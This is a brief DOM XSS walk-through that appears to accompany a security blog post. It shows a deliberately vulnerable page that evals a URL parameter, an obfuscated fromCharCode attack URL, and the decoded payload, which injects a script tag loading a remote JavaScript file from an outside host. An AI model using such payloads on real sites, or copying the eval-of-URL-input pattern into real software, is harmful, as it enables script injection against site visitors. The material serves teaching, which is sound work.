DOM XSS 101 Walk-Through
*******
Blog discussing this: http://neonprimetime.blogspot.com/2016/01/dom-xss-101-walk-through.html
*******
<html>
<body>
<script type="text/javascript">
  function logUserId(userid){
    console.log('debug: userid found was \'' + userid + '\'');
  }
  // Source: the full page URL, i.e. whatever follows "userid=" in the link the visitor opened
  var myurl = window.location.href;
  var useridstartindex = myurl.indexOf("userid=") + 7;
  var userid = myurl.substring(useridstartindex, myurl.length);
  // Sink: the untrusted value is concatenated into a string that is then executed as code
  var calllogfunction = 'logUserId(' + userid.toString() + ')';
  eval(calllogfunction);
</script>
</body>
</html>
<!-- DOM XSS Example url: hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))// -->
<!-- DOM XSS Example code: s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s); -->
*******
More FROM @neonprimetime security
http://pastebin.com/u/Neonprimetime
https://www.virustotal.com/en/USER/neonprimetime/
https://twitter.com/neonprimetime
https://www.reddit.com/USER/neonprimetime